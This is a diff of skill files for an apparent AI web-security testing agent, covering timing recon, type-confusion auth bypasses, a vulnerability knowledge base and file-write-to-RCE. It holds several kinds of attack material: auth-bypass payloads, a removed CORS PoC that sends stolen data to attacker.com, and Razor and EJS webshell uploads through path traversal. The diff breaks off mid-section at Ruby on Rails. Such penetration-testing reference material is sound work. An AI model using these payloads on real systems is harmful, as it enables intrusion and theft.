-description: Ground-truth subdomain takeover candidates against can-i-take-over-xyz before reporting. Use when an agent or scanner flags a potential subdomain takeover, dangling CNAME, or unclaimed cloud resource.
+description: Ground-truth subdomain takeover candidates by checking CNAME resolution, verifying service availability, and validating fingerprint matches against can-i-take-over-xyz before reporting. Use when an agent or scanner flags a potential subdomain takeover, dangling CNAME, or unclaimed cloud resource.
 ---
 
 # Subdomain Takeover Ground-Truth Check
@@ -9,10 +9,26 @@ Validates subdomain takeover candidates against the canonical [can-i-take-over-x
 
 ## Procedure
 
-1. **Resolve DNS** — `dig CNAME <subdomain>` to identify the target service
-2. **Fetch the registry** — pull the raw README from `https://raw.githubusercontent.com/EdOverflow/can-i-take-over-xyz/master/README.md` and find the service row
+1. **Resolve DNS** — identify the target service:
+   ```bash
+   dig CNAME <subdomain> +short
+   ```
+   If no CNAME is returned, check for A/AAAA records with `dig A <subdomain> +short`. No DNS resolution at all suggests the record was already cleaned up — flag as INVESTIGATE but note DNS is clean.
+
+2. **Fetch the registry** — pull the raw README and find the service row:
+   ```bash
+   curl -s https://raw.githubusercontent.com/EdOverflow/can-i-take-over-xyz/master/README.md | rg -i "<service_name>"
+   ```
+   If the registry fetch fails (network error, 404), note it and proceed with manual assessment.
+
 3. **Check status** — is the service listed as `Vulnerable`, `Not Vulnerable`, or `Edge Case`?
-4. **Match fingerprint** — does the HTTP response body match the documented fingerprint? (e.g. `NoSuchBucket`, `There isn't a GitHub Pages site here`)
+
+4. **Match fingerprint** — fetch the subdomain and check for the documented fingerprint:
+   ```bash
+   curl -skL "https://<subdomain>" -o /tmp/takeover_body.txt 2>/dev/null
+   rg -c "NoSuchBucket\|There isn't a GitHub Pages site here\|This page is reserved" /tmp/takeover_body.txt
+   ```
+
 5. **Credence check** — run `credence assess_confidence` with: service name, registry status, fingerprint match result, and raw evidence
 
 ## Output

--- a/capabilities/web-security/skills/timing-attack-recon/SKILL.md
+++ b/capabilities/web-security/skills/timing-attack-recon/SKILL.md
@@ -7,97 +7,95 @@ description: Discover hidden parameters, headers, and scoped SSRFs via server-si
 
 Measure response time deltas to find attack surface invisible in response bodies. Server-side operations (DNS lookup, DB query, log write, proxy routing) add 5-50ms. Isolate these from network jitter using single-packet synchronization.
 
-## Why This Exists
-
-Standard fuzzing keys on status codes, body diffs, content-length. When the app returns identical responses regardless of input, timing is the only remaining signal. This technique found hidden parameters and scoped SSRFs that content-based fuzzing missed entirely.
-
 ## Eliminate Network Jitter First
 
 Server-side deltas are 1-50ms. Network jitter is 10-100ms+. You **must** eliminate jitter or you'll drown in noise.
 
-**HTTP/2 single-packet**: Send N requests multiplexed in one TCP packet. All arrive within ~1ms. Compare response times — delta is pure server-side.
+**HTTP/2 single-packet**: Send N requests multiplexed in one TCP packet. All arrive within ~1ms. Compare response times -- delta is pure server-side.
 
 **HTTP/1.1 last-byte sync**: Open N connections, send all but final byte, release final bytes simultaneously. ~4ms spread.
 
-Use Turbo Intruder's single-packet attack mode or `curl --parallel` over H2.
-
 ## Baseline
 
-Before testing, establish what "normal" looks like:
-1. Send 20 identical requests via single-packet
-2. Record response times
-3. Calculate mean and stddev
-4. Anything >2 stddev above mean on a specific input = signal
+```bash
+# Statistical baseline: 20 requests, calculate mean and stddev
+times=()
+for i in $(seq 1 20); do
+  t=$(curl -s -o /dev/null -w "%{time_total}" "https://target.com/api/endpoint")
+  times+=("$t")
+done
+
+python3 -c "
+import sys
+times = [float(t) for t in '${times[*]}'.split()]
+mean = sum(times) / len(times)
+stddev = (sum((t - mean) ** 2 for t in times) / len(times)) ** 0.5
+print(f'Baseline: mean={mean*1000:.1f}ms stddev={stddev*1000:.1f}ms')
+print(f'Signal threshold: >{(mean + 2*stddev)*1000:.1f}ms (mean + 2*stddev)')
+"
+```
+
+**Checkpoint:** Anything >2 stddev above mean on a specific input = signal worth investigating.
 
 ## Hidden Parameter Discovery
 
-Add candidate parameters one at a time. Parameters that trigger server-side logic add measurable delay.
-
-**Why parameters cause delays:**
-- DNS lookup on parameter value (app tries to resolve it)
-- Log write for unexpected parameter name
-- Validation/regex check on specific parameter names
-- DB query triggered by parameter presence (feature flags, debug modes)
-
 ```bash
-# Manual with curl timing
-for param in debug admin internal test verbose trace; do
-  time curl -s -o /dev/null -w "%{time_total}" "https://target.com/api?${param}=1"
-done
+BASELINE_MEAN=0.045  # Set from baseline above (seconds)
+BASELINE_STDDEV=0.003
+
+for param in debug admin internal test verbose trace log callback url redirect next; do
+  t=$(curl -s -o /dev/null -w "%{time_total}" "https://target.com/api?${param}=1")
+  delta=$(python3 -c "print(f'{($t - $BASELINE_MEAN)*1000:.1f}')")
+  sigma=$(python3 -c "d=($t-$BASELINE_MEAN)/$BASELINE_STDDEV; print(f'{d:.1f}')")
+  echo "param=$param time=${t}s delta=${delta}ms (${sigma}sigma)"
+done | sort -t'(' -k2 -rn | head -5
 ```
 
-**Better**: Use Param Miner (Burp) which automates this with statistical analysis, or Turbo Intruder with timing comparison.
-
-Consistent 5ms+ delta on a specific parameter = that parameter triggers backend logic. Investigate further even if the response body is unchanged.
+Params with >2 sigma trigger backend logic -- investigate even if response body is unchanged.
 
 ## Hidden Header Discovery
 
-Same principle. Add candidate headers, measure timing.
-
-Priority headers to test:
+Same principle. Priority headers to test:
 - `X-Forwarded-For`, `X-Real-IP`, `X-Original-URL`, `X-Rewrite-URL`
 - `X-Debug`, `X-Debug-Token`, `X-Admin`, `X-Internal`
 - `X-Forwarded-Host`, `X-Forwarded-Proto`, `X-Forwarded-Scheme`
 
 ## Scoped SSRF Detection via Timing
 
-This is the highest-value technique. Detect proxy endpoints that route to internal services — even when responses are identical.
-
-**How it works**: A proxy that allows certain domains routes requests internally (fast). Blocked domains either timeout or get rejected (different timing). Even if both return `200 OK` with identical bodies, the timing differs.
+Highest-value technique. Detect proxy endpoints routing to internal services -- even when responses are identical.
 
 ```
-?url=https://google.com        → 200ms (external, blocked or slow)
-?url=https://internal.corp.com  → 45ms  (internal, routed directly)
-?url=https://10.0.0.1           → 48ms  (internal, routed directly)
+?url=https://google.com        -> 200ms (external, blocked or slow)
+?url=https://internal.corp.com  -> 45ms  (internal, routed directly)
+?url=https://10.0.0.1           -> 48ms  (internal, routed directly)
 ```
 
 ### Enumerate Internal Targets
-Once you've identified a scoped proxy via timing:
-1. Feed it your subdomain list — timing reveals which resolve internally
+Once scoped proxy is confirmed via timing:
+1. Feed it your subdomain list -- timing reveals which resolve internally
 2. Test RFC1918 ranges on common ports (80, 443, 8080, 8443)
-3. Use `surf -l hosts.txt` to pre-filter candidates that are internal-only
+3. Pre-filter candidates: `surf -l hosts.txt`
 
 ### Front-End Impersonation
-If the proxy respects `X-Forwarded-For`:
+If the proxy respects forwarded headers:
 ```
-Request without header:             150ms
-Request with X-Forwarded-For: 10.0.0.1:  45ms (internal routing!)
+Request without header:                    150ms
+Request with X-Forwarded-For: 10.0.0.1:    45ms (internal routing!)
 ```
-The header convinced the proxy you're internal. Now access internal-only endpoints.
 
 ## Decision Logic
 
 ```
 Target returns uniform responses to all inputs
-  ├── Establish timing baseline (20 identical requests, single-packet)
-  ├── Fuzz parameters → any with >2 stddev delay?
-  │     └── Yes → investigate that parameter (feature flag? debug? SSRF?)
-  ├── Fuzz headers → any with timing delta?
-  │     └── Yes → test X-Forwarded-For/Host impersonation
-  ├── Suspect proxy/SSRF endpoint?
-  │     ├── Compare timing: external domain vs internal IP vs internal subdomain
-  │     └── Fast response on internal = scoped SSRF → enumerate internal services
-  └── All uniform → timing vector exhausted, try other approaches
+  |-- Establish timing baseline (20 identical requests, single-packet)
+  |-- Fuzz parameters -> any with >2 sigma delay?
+  |     +-- Yes -> investigate (feature flag? debug? SSRF?)
+  |-- Fuzz headers -> any with timing delta?
+  |     +-- Yes -> test X-Forwarded-For/Host impersonation
+  |-- Suspect proxy/SSRF endpoint?
+  |     |-- Compare timing: external domain vs internal IP vs internal subdomain
+  |     +-- Fast response on internal = scoped SSRF -> enumerate internal services
+  +-- All uniform -> timing vector exhausted, try other approaches
 ```
 
 ## Chain With

--- a/capabilities/web-security/skills/type-confusion-testing/SKILL.md
+++ b/capabilities/web-security/skills/type-confusion-testing/SKILL.md
@@ -1,0 +1,105 @@
+---
+name: type-confusion-testing
+description: "Exploit type confusion vulnerabilities where applications receive unexpected data types (array instead of string, null instead of integer, object instead of scalar). Use when testing parameter handling, auth bypasses, or input validation across PHP, Ruby, JS, Python, Java, and Go."
+---
+
+# Type Confusion Testing
+
+Applications assume parameters arrive as specific types. When they don't, security checks fail, queries change shape, and comparisons produce unexpected results.
+
+## Core Concept
+
+```
+Developer expects: email=user@example.com  (string)
+Attacker sends:    email[]=user@example.com&email[]=attacker@example.com  (array)
+
+Developer expects: admin=false  (boolean)
+Attacker sends:    admin=1  (integer that coerces to true)
+```
+
+## Testing Methodology
+
+### Step 1: Identify Target Parameters
+
+Focus on parameters that control authentication, authorization, business logic, and data retrieval.
+
+### Step 2: Send Type Variants
+
+| Original Type | Test With | Query String | JSON |
+|--------------|-----------|-------------|------|
+| String | Array | `param[]=value` | `{"param": ["value"]}` |
+| String | Integer | `param=0` | `{"param": 0}` |
+| String | Boolean | `param=true` | `{"param": true}` |
+| String | Null | `param=` | `{"param": null}` |
+| String | Object | `param[key]=value` | `{"param": {"key": "value"}}` |
+| Integer | Negative | `param=-1` | `{"param": -1}` |
+| Integer | Zero | `param=0` | `{"param": 0}` |
+| Integer | Large | `param=99999999999` | `{"param": 99999999999}` |
+| Any | Mixed array | N/A | `{"param": [1, "a", null, true]}` |
+
+### Step 3: Analyze Responses
+
+| Response | Signal |
+|----------|--------|
+| 500 / stack trace | Type not handled -- info leak, potential DoS |
+| Different status code | Type influences control flow |
+| Different body length | Type changes query results |
+| Same 200 as valid input | Type confusion may have bypassed validation |
+
+### Step 4: Exploit
+
+Determine what security check was bypassed, craft payload for impact, document the chain.
+
+## Techniques by Language
+
+See [references/language-techniques.md](references/language-techniques.md) for detailed exploitation techniques across PHP, Ruby, JavaScript, Python, Java, and Go.
+
+### Quick Hits
+
+**PHP magic hash bypass (password/token comparison):**
+```php
+// if ($user_hash == $input_hash) — loose comparison
+// MD5("240610708")  = "0e462097431906509019562988736854"
+// MD5("QNKCDZO")   = "0e830400451993494058024219903391"
+// Both == 0 in loose comparison
+```
+
+**PHP array injection:**
+```php
+// strcmp(array, string) returns NULL; NULL == 0 → true → auth bypass
+// password[]=anything bypasses strcmp($password, $stored) == 0
+```
+
+**JSON boolean bypass:**
+```json
+{"otp": true}
+// if compared with == in PHP: true == "123456" → true → OTP bypass
+```
+
+**NoSQL injection via type:**
+```json
+{"username": "admin", "password": {"$ne": ""}}
+// MongoDB: password != "" → always true → auth bypass
+```
+
+## Detection in Source Code
+
+```bash
+# PHP loose comparisons
+grep -rn ' == ' --include="*.php" | grep -v '==='
+grep -rn 'strcmp\|in_array\|array_search' --include="*.php" | grep -v 'true)'
+
+# JavaScript loose equality
+grep -rn ' == ' --include="*.js" | grep -v '==='
+
+# Python truthy checks on user input
+grep -rn "if.*\.get\(" --include="*.py"
+```
+
+## Related Skills
+
+- **libmagic-type-confusion** -- File MIME type confusion
+- **auth-matrix-testing** -- Type confusion as IDOR/auth bypass vector
+- **parser-differential-bypass** -- Type interpretation differs between layers
+- **orm-filter-data-leak** -- NoSQL operator injection via type confusion
+- **custom-sanitizer-audit** -- Sanitizers that assume string input

--- a/capabilities/web-security/skills/type-confusion-testing/references/language-techniques.md
+++ b/capabilities/web-security/skills/type-confusion-testing/references/language-techniques.md
@@ -1,0 +1,110 @@
+# Type Confusion Techniques by Language
+
+## PHP (Highest Value Target)
+
+PHP's loose comparison (`==`) and implicit type coercion make it the richest type confusion surface.
+
+**Loose comparison table (critical entries):**
+
+| Expression | Result | Why |
+|-----------|--------|-----|
+| `"0" == false` | true | String "0" is falsy |
+| `"" == false` | true | Empty string is falsy |
+| `"0e123" == "0e456"` | true | Both parse as 0 in scientific notation |
+| `"0e123" == 0` | true | Scientific notation string == 0 |
+| `[] == false` | true | Empty array is falsy |
+| `"php" == 0` | true (PHP < 8.0) | Non-numeric string coerces to 0 |
+
+**Magic hash bypass:**
+```php
+// Known "magic" hashes that == "0":
+// MD5("240610708")  = "0e462097431906509019562988736854"
+// MD5("QNKCDZO")   = "0e830400451993494058024219903391"
+// SHA1("aaroZmOk")  = "0e66507019969427134894567494305185566735"
+```
+
+**Array injection:**
+```php
+// strcmp(array, string) returns NULL
+// NULL == 0 -> true -> auth bypass
+$password = $_POST['password'];  // attacker sends password[]=anything
+if (strcmp($password, $stored) == 0) { login(); }
+
+// in_array without strict
+if (in_array($role, ['admin', 'moderator'])) { grant(); }
+// $role = true -> in_array(true, ['admin']) -> true
+```
+
+**JSON type injection:**
+```json
+// {"password": true} -> true == "secret123" -> true (PHP loose)
+// {"otp": 123456} -> int vs string comparison
+// {"id": ["42", "99"]} -> array in SQL query
+```
+
+## Ruby
+
+**Mass assignment with type confusion:**
+```ruby
+# GitLab CVE (password reset):
+# POST /users/password
+# user[email][]=victim@example.com&user[email][]=attacker@example.com
+# App validates first email, sends reset to both
+```
+
+## JavaScript / Node.js
+
+**Express.js query parsing:**
+```javascript
+// ?role=admin    -> req.query.role = "admin"  (string)
+// ?role[]=admin  -> req.query.role = ["admin"] (array)
+// String "user".includes("adm") -> false
+// Array ["user", "admin"].includes("admin") -> true
+```
+
+**Prototype pollution via type confusion:**
+```javascript
+// {"role": "user", "__proto__": {"isAdmin": true}}
+// Recursive merge functions (lodash.merge, deep-extend) DO pollute
+// After pollution: ({}).isAdmin -> true for ALL new objects
+```
+
+**parseInt / Number coercion:**
+```javascript
+parseInt("123abc")  // 123 (stops at first non-digit)
+Number("")          // 0 (empty string -> 0)
+Number(null)        // 0
+Number([])          // 0 ([] -> "" -> 0)
+Number([5])         // 5
+```
+
+## Python
+
+```python
+# VULNERABLE: truthy check instead of type check
+if data.get('admin'):  # True for any truthy value
+    grant_admin()
+# Attack: {"admin": 1}, {"admin": "yes"}, {"admin": [1]}
+
+# NoSQL operator injection
+# {"password": {"$gt": ""}} -> MongoDB: always true
+```
+
+## Java / Go (Strict but Not Immune)
+
+```java
+// String.equals() on null -> NullPointerException
+// If exception caught and treated as "skip check" -> bypass
+String token = request.getParameter("token");
+if (token.equals(expectedToken)) {  // NPE if token is null
+    // ... but what does the catch block do?
+}
+```
+
+```go
+// JSON unmarshaling into interface{} loses type info:
+var data map[string]interface{}
+json.Unmarshal(body, &data)
+// data["count"] could be float64, string, bool, nil, []interface{}, map...
+// Type assertion without check: data["count"].(string) -> panic
+```

--- a/capabilities/web-security/skills/vuln-kb/SKILL.md
+++ b/capabilities/web-security/skills/vuln-kb/SKILL.md
@@ -1,186 +1,94 @@
 ---
 name: vuln-kb
-description: Local vulnerability knowledge base with CWE references, attack playbooks by tech stack, and detection signatures. Use when you need vulnerability context, CWE details, attack strategies for a specific technology, or detection signatures. Triggers on "vuln-kb", "vulnerability knowledge", "CWE", "attack playbook", "detection signature", "vulnerability reference", "what is CWE", "how to test for".
+description: Local vulnerability knowledge base with CWE references, attack playbooks by tech stack, and detection signatures. Use when you need vulnerability context for a specific CWE, attack strategies for a technology stack, detection signatures for static analysis, or mapping between static analysis signals and vulnerability classes.
 ---
 
 # Vulnerability Knowledge Base
 
-Local reference for vulnerability classes, CWE mappings, attack playbooks, and detection signatures.
+Quick-reference for vulnerability classes, CWE mappings, and detection patterns. For full checklists and analysis strategies, see reference files in this directory.
 
-## CWE Quick Reference
+## Lookup Workflow
 
-### Injection Flaws (OWASP A03:2021)
+1. **Identify signal** -- what did you find? (static analysis match, HTTP traffic pattern, error message)
+2. **Map to vuln class** -- use the Signal -> Vulnerability table below
+3. **Get CWE details** -- find the matching CWE section for test strategy and detection signals
+4. **Verify** -- use the test commands and grep patterns to confirm
 
-| CWE | Name | Source | Sink | Key Signal |
-|-----|------|--------|------|------------|
-| CWE-89 | SQL Injection | User input (params, forms, headers) | Database query (execute, query, prepare without params) | Error messages containing SQL syntax, boolean response differences |
-| CWE-78 | OS Command Injection | User input | System calls (exec, system, popen, subprocess) | Command output in response, time delays |
-| CWE-79 | Cross-Site Scripting | User input | HTML output (innerHTML, document.write, server-side template) | Unencoded reflection in HTML context |
-| CWE-94 | Code Injection | User input | eval(), Function(), setTimeout(string) | Dynamic code execution |
-| CWE-917 | Expression Language Injection | User input | Template engine (Jinja2, Freemarker, Twig, Thymeleaf) | Template syntax in output (e.g., `49` from `{{7*7}}`) |
-| CWE-74 | Improper Neutralization | User input | Any interpreter | Base class for all injection flaws |
+**Checkpoint:** Before reporting, confirm you have: CWE ID, working PoC, and impact statement.
 
-**Detection signals**: `path`, `api_path`, `query_param` matches near sink patterns; error responses containing SQL/template syntax after injection attempts.
-
-### Broken Access Control (OWASP A01:2021)
-
-| CWE | Name | Pattern | Test Strategy |
-|-----|------|---------|---------------|
-| CWE-639 | IDOR | Sequential/predictable resource IDs | Two accounts, cross-access resources |
-| CWE-862 | Missing Authorization | Endpoints without auth check | Access without token/session |
-| CWE-863 | Incorrect Authorization | Auth present but wrong check | Vertical/horizontal privilege escalation |
-| CWE-22 | Path Traversal | File path in parameter | `../` sequences to escape directory |
-| CWE-284 | Improper Access Control | General access control failure | Map all auth boundaries, test each |
-| CWE-276 | Incorrect Default Permissions | Overly permissive defaults | Check new resource permissions |
-
-**Detection signals**: API paths with ID-like segments (`/api/.*/[0-9]+`), endpoints returning different data per user context.
-
-### Cross-Site Scripting Detail (CWE-79)
-
-| Subtype | Source | Sink | Detection |
-|---------|--------|------|-----------|
-| Reflected | URL params, form input | Server-side template output | Input reflected in response without encoding |
-| Stored | Database/persistent input | Any output rendering stored data | Payload persists across requests |
-| DOM-based | URL fragment, document.referrer | innerHTML, document.write, eval | Client-side JS processes URL data |
-
-**Static analysis signals**: `dangerouslySetInnerHTML`, `innerHTML` assignments, `document.write`, `url_search_params` flowing to `window.location` assignment.
-
-### Cross-Origin Resource Sharing (CWE-942 / CWE-184)
-
-| Misconfiguration | Test | Exploitation Requirements |
-|------------------|------|--------------------------|
-| `Access-Control-Allow-Origin: *` with credentials | Send `Origin: attacker.com`, check if reflected with `Access-Control-Allow-Credentials: true` | Must demonstrate credential theft or state-changing action |
-| Dynamic origin reflection | Send `Origin: attacker.com`, check if echoed in response header | Must bypass mitigating factors; must show actual data exfiltration |
-| Null origin allowed | Send `Origin: null`, check for `Access-Control-Allow-Origin: null` | Common with local file:// attacks; needs PoC with credential theft |
-| Weak regex matching | Test `Origin: target.com.attacker.com` or `Origin: attacker-target.com` | Must prove regex bypass and data access |
-
-**Reporting Standard:**
-- Just reflecting the Origin header is **NOT sufficient** for a valid report
-- Must provide **working JavaScript PoC** that extracts session cookies, tokens, or performs authenticated actions
-- Must demonstrate **account takeover** or **state-changing actions** via CORS abuse
-- Theoretical CORS issues without exploitation = **Informational/Rejected**
-
-**Test Commands:**
-```bash
-# Test basic reflection
-curl -s -H "Origin: https://attacker.com" \
-  "https://target.com/api/user" | grep -i "access-control"
-
-# Test with credentials
-curl -s -H "Origin: https://attacker.com" \
-  -H "Cookie: session=xyz" \
-  "https://target.com/api/user" -v 2>&1 | grep -i "access-control"
-```
-
-**Working PoC Template:**
-```html
-<script>
-// Must actually extract sensitive data or perform actions
-fetch('https://target.com/api/user', {
-  credentials: 'include',
-  headers: {'Accept': 'application/json'}
-})
-.then(r => r.json())
-.then(data => {
-  // Exfiltrate to attacker server
-  fetch('https://attacker.com/steal?data=' + btoa(JSON.stringify(data)));
-});
-</script>
-```
-
-### Server-Side Request Forgery (CWE-918)
-
-| Pattern | Test | Impact |
-|---------|------|--------|
-| URL parameter | `url=http://127.0.0.1` | Internal network access |
-| Webhook URL | Register callback to internal IP | Internal service interaction |
-| File import | Import from `file:///etc/passwd` | Local file read |
-| PDF/Image generation | Embed internal URL in content | Blind SSRF via render |
-
-**Detection signals**: Parameters named `url`, `fetch`, `proxy`, `callback`, `webhook`, `redirect`, `href`, `src` in query strings or request bodies.
-
-### Authentication/Session (OWASP A07:2021)
-
-| CWE | Name | Test |
-|-----|------|------|
-| CWE-287 | Improper Authentication | Bypass login without valid credentials |
-| CWE-384 | Session Fixation | Force known session ID on victim |
-| CWE-613 | Insufficient Session Expiration | Check token lifetime, no logout invalidation |
-| CWE-798 | Hardcoded Credentials | Scan source for API keys, passwords |
-| CWE-307 | Brute Force | Unlimited login attempts without lockout |
-
-**Detection signals**: Leaked secrets (JWT, API keys, tokens) in JS source or responses; auth-related endpoints (`/login`, `/auth`, `/token`, `/session`).
-
-### Cryptographic Failures (OWASP A02:2021)
-
-| CWE | Name | Signal |
-|-----|------|--------|
-| CWE-327 | Broken Crypto Algorithm | MD5, SHA1 for passwords, DES encryption |
-| CWE-328 | Reversible One-Way Hash | Weak hash without salt |
-| CWE-330 | Insufficient Randomness | Math.random() for tokens, sequential IDs |
-| CWE-311 | Missing Encryption | Sensitive data over HTTP, plaintext storage |
-
-### Business Logic
-
-| Category | Pattern | Test |
-|----------|---------|------|
-| Race Condition | Concurrent state changes | Parallel requests to same endpoint |
-| Price Manipulation | Client-side price calculation | Modify price in request body |
-| Workflow Bypass | Multi-step process | Skip steps, replay earlier step |
-| Privilege Escalation | Role-based features | Access admin features as regular user |
-
-### AI/LLM Specific (OWASP LLM Top 10)
-
-| Category | CWE Analog | Pattern |
-|----------|-----------|---------|
-| Prompt Injection | CWE-74 (injection) | User input reaches model context without sanitization |
-| Insecure Output | CWE-79 (XSS) | Model output rendered as HTML/code without sanitization |
-| Training Data Poisoning | CWE-502 (deserialization) | Malicious data in training/fine-tuning pipeline |
-| Excessive Agency | CWE-269 (privilege) | Model has unrestricted tool access |
-| System Prompt Leak | CWE-200 (info disclosure) | System instructions extractable via prompt manipulation |
-
-## Static Analysis Signal -> Vulnerability Mapping
+## Signal -> Vulnerability Mapping
 
 | Signal Pattern | Potential Vulnerability | Priority |
 |---|---|---|
 | `dangerouslySetInnerHTML` | DOM XSS (React) | High |
 | `innerHTML` assignment | DOM XSS (vanilla JS) | High |
-| `window.onmessage` / `addEventListener('message')` | postMessage XSS / cross-origin abuse | High |
+| `addEventListener('message')` | postMessage XSS / cross-origin abuse | High |
 | `location.href` / `window.location` assignment | Open redirect / javascript: XSS | Medium |
-| `URLSearchParams` | Client-side parameter injection | Medium |
-| Hardcoded JWT | Token reuse (test if valid) | High |
-| Leaked API keys / tokens | Credential exposure | Critical |
-| `__schema` / `__type` in requests | GraphQL introspection surface | Medium |
+| Hardcoded JWT / API keys in JS | Credential exposure | Critical |
 | API paths with numeric IDs | IDOR candidates | Medium |
+| `__schema` / `__type` in requests | GraphQL introspection | Medium |
 
-## Useful Grep Patterns for HTTP Traffic
+## CWE Quick Reference
 
+### Injection (OWASP A03)
+
+| CWE | Name | Key Signal |
+|-----|------|------------|
+| CWE-89 | SQL Injection | Error messages with SQL syntax, boolean response differences |
+| CWE-78 | OS Command Injection | Command output in response, time delays |
+| CWE-79 | XSS | Unencoded reflection in HTML context |
+| CWE-94 | Code Injection | Dynamic code execution via eval/Function |
+| CWE-917 | Expression Language Injection | Template syntax in output (`49` from `{{7*7}}`) |
+
+### Broken Access Control (OWASP A01)
+
+| CWE | Name | Test Strategy |
+|-----|------|---------------|
+| CWE-639 | IDOR | Two accounts, cross-access resources |
+| CWE-862 | Missing Authorization | Access without token/session |
+| CWE-863 | Incorrect Authorization | Vertical/horizontal privilege escalation |
+| CWE-22 | Path Traversal | `../` sequences to escape directory |
+
+### SSRF (CWE-918)
+
+| Pattern | Test | Impact |
+|---------|------|--------|
+| URL parameter | `url=http://127.0.0.1` | Internal network access |
+| Webhook URL | Callback to internal IP | Internal service interaction |
+| PDF/Image generation | Embed internal URL | Blind SSRF via render |
+
+Detection: parameters named `url`, `fetch`, `proxy`, `callback`, `webhook`, `redirect`, `href`, `src`.
+
+### CORS Misconfiguration (CWE-942)
+
+```bash
+# Test origin reflection
+curl -s -H "Origin: https://attacker.com" "https://target.com/api/user" | grep -i "access-control"
+
+# Test with credentials
+curl -s -H "Origin: https://attacker.com" -H "Cookie: session=xyz" \
+  "https://target.com/api/user" -v 2>&1 | grep -i "access-control"
 ```
-# IDOR candidates - endpoints with numeric IDs
-/[a-z]+/[0-9]+(/|$)
 
-# Potential file inclusion
-(file|path|dir|folder|template|page|include)=
+**Reporting standard:** Origin reflection alone is NOT sufficient. Must provide working JS PoC demonstrating credential theft or state-changing action.
 
-# Potential SSRF
-(url|uri|href|src|redirect|callback|proxy|fetch)=
+## Grep Patterns for HTTP Traffic
+
+```bash
+# IDOR candidates
+rg '/[a-z]+/[0-9]+(/|$)' http_requests/
+
+# Potential SSRF parameters
+rg '(url|uri|href|src|redirect|callback|proxy|fetch)=' http_requests/
 
 # Auth tokens in URLs (should be in headers)
-(token|key|api_key|apikey|secret|auth|session)=
+rg '(token|key|api_key|secret|auth|session)=' http_requests/
 
-# Sensitive data in responses
-(password|secret|private_key|api_key|token)
-
-# Error messages
-(exception|traceback|stack trace|syntax error|SQLSTATE)
-
-# Mass assignment candidates
-PATCH or PUT requests with extra fields
+# Error messages leaking info
+rg '(exception|traceback|stack.trace|syntax.error|SQLSTATE)' http_requests/
 ```
 
-## Usage
+## Reference Files
 
-This knowledge base is consulted during:
-1. **vuln-critic** - To validate finding plausibility and map to CWE
-2. **exploit-verifier** - To select appropriate verification procedures
-3. Testing strategy guidance based on tech stack
+- [testing-checklist.md](testing-checklist.md) -- Full testing checklist by category
+- [analysis-strategies.md](analysis-strategies.md) -- Six analysis lenses (taint, trust boundary, business logic, config audit, race conditions, cross-context)

--- a/capabilities/web-security/skills/write-path-to-rce/SKILL.md
+++ b/capabilities/web-security/skills/write-path-to-rce/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: write-path-to-rce
-description: Escalate arbitrary file write into code execution by abusing framework view or template resolution. Use when you can write files but cannot execute script extensions directly, and the framework auto-loads templates or code from predictable search paths.
+description: Escalate arbitrary file write into code execution -- plant malicious Jinja2/EJS/Razor/Blade templates, overwrite framework view files, inject auto-loaded helpers. Covers Django, Flask, Express, Rails, Laravel, ASP.NET MVC. Use when you have arbitrary write (path traversal, upload) but cannot execute script extensions directly, and the framework auto-loads templates or code from predictable search paths.
 ---
 
 # Arbitrary File Write -> RCE via View Engine Resolution

--- a/capabilities/web-security/skills/write-path-to-rce/SKILL.md
+++ b/capabilities/web-security/skills/write-path-to-rce/SKILL.md
@@ -6,52 +6,102 @@ description: Escalate arbitrary file write into code execution by abusing framew
 # Arbitrary File Write -> RCE via View Engine Resolution
 
 ## Pattern
-- You have arbitrary file write through path traversal, upload, report generation, or similar functionality
+- You have arbitrary file write (path traversal, upload, report generation)
 - The web server blocks direct requests to executable extensions
 - The framework still resolves, compiles, or loads files internally from the filesystem
 
-## Key Insight
-HTTP-layer request filtering and filesystem-level template lookup are different control planes. A framework can execute a written file through internal resolution even when direct URL access to that extension is blocked.
+HTTP-layer request filtering and filesystem-level template lookup are different control planes. A framework can execute a written file through internal resolution even when direct URL access is blocked.
 
-## Framework Cheatsheet
+## Workflow
 
-### ASP.NET MVC (Razor)
-Typical search paths include:
-- `~/Views/{controller}/{action}.cshtml`
-- `~/Views/Shared/{action}.cshtml`
+### 1. Confirm arbitrary write
+```bash
+# Write a canary file to a known location
+curl -x localhost:8080 -k "https://target.com/upload" \
+  -F "file=@canary.txt;filename=../../../tmp/canary.txt"
 
-Write a Razor payload into a reachable search path and trigger the matching controller or action.
+# Verify write
+curl -x localhost:8080 -k "https://target.com/tmp/canary.txt"
+```
 
-### Ruby on Rails
-Zeitwerk and wildcard routing can make controller or helper writes reachable when files land inside autoload paths such as:
-- `app/controllers/`
-- `app/models/`
-- `app/helpers/`
-- `lib/`
+**Checkpoint:** If canary file is not written, the write primitive is not confirmed. Stop here.
 
-### Express.js
-If the application renders attacker-writable EJS or Pug templates from `views/`, template execution becomes server-side code execution.
+### 2. Identify framework and map resolution paths
 
-### Django and Flask
-If the target uses Jinja2 or unsafe template rendering paths, attacker-writable templates can execute on render.
+```bash
+# Check response headers for framework hints
+curl -x localhost:8080 -k -sD- "https://target.com/" | rg -i "x-powered-by|server|x-aspnet"
 
-### Laravel
-Blade templates written into `resources/views/` become reachable through normal view resolution.
+# Trigger a 404 to see error page (often reveals framework + view paths)
+curl -x localhost:8080 -k "https://target.com/nonexistent_route_xyz"
+```
 
-### Go
-Go templates are usually more constrained. In Go applications, arbitrary write more often needs to chain into source replacement, build triggers, or unsafe helper functions rather than template execution alone.
+### 3. Write payload to searched path
 
-## Detection
-- Error messages disclose view search paths
-- ProcMon or `strace` shows framework file lookups during normal requests
-- Writable application paths overlap with template, view, or autoload directories
+#### ASP.NET MVC (Razor)
+```bash
+# View resolution: ~/Views/{controller}/{action}.cshtml, ~/Views/Shared/{action}.cshtml
+# Write webshell to a view path
+echo '@{ System.Diagnostics.Process.Start("cmd.exe", "/c whoami > C:\\inetpub\\wwwroot\\out.txt"); }' > payload.cshtml
+curl -x localhost:8080 -k "https://target.com/upload" \
+  -F "file=@payload.cshtml;filename=../Views/Shared/Error.cshtml"
+# Trigger: visit any URL that renders the Error view (e.g., cause a 500)
+```
 
-## Validation Steps
-1. Confirm arbitrary write by placing a canary file.
-2. Map the framework's resolution order.
-3. Write a payload into a searched path.
-4. Trigger the code path that resolves or renders that file.
-5. Confirm execution with a benign command, callback, or file creation.
+#### Express.js (EJS/Pug)
+```bash
+# View resolution: views/{name}.ejs
+echo '<%= process.mainModule.require("child_process").execSync("id").toString() %>' > payload.ejs
+curl -x localhost:8080 -k "https://target.com/upload" \
+  -F "file=@payload.ejs;filename=../views/index.ejs"
+# Trigger: visit the route that renders index view
+```
+
+#### Ruby on Rails
+```bash
